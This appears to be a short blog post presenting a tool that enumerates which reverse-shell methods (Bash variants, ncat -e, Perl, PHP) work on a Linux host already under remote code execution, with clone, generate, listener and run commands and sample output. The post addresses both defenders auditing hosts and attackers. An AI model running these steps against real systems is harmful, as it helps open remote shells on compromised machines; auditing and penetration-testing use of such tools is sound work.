Why?
You're a defender wanting to audit to see which reverse shells work out of the box on a particular host. Or, you're a lazy attacker wanting to quickly determine which reverse shells will work.
When?
You have remote code execution on a Linux host, and the noise this enumeration generates is not an operational concern.
How?
- Clone the repo:
git clone https://github.com/fx2301/reverseshellenum.git
cd reverseshellenum
- Generate yourself a fresh script:
LHOST="10.10.0.123" LPORT=31373 python3 generate.py
- Run the listener:
./listen.sh
- Run the reverse shell enumerator on the target host:
./reverseshellenum.sh
- Observe which shells work (refer to shells.json):
$ ./listen.sh
[i] Starting Reverse Shell Audit
[+] Success: Bash -i
[+] Success: Bash 196
[+] Success: Bash read line
[+] Success: Bash 5
[+] Success: ncat -e
[+] Success: Perl
[+] Success: Perl no sh
[+] Success: PHP Emoji
[i] Ending Reverse Shell Audit
PR's welcome! Kudos to revshells.com for the raw material.
Top comments (0)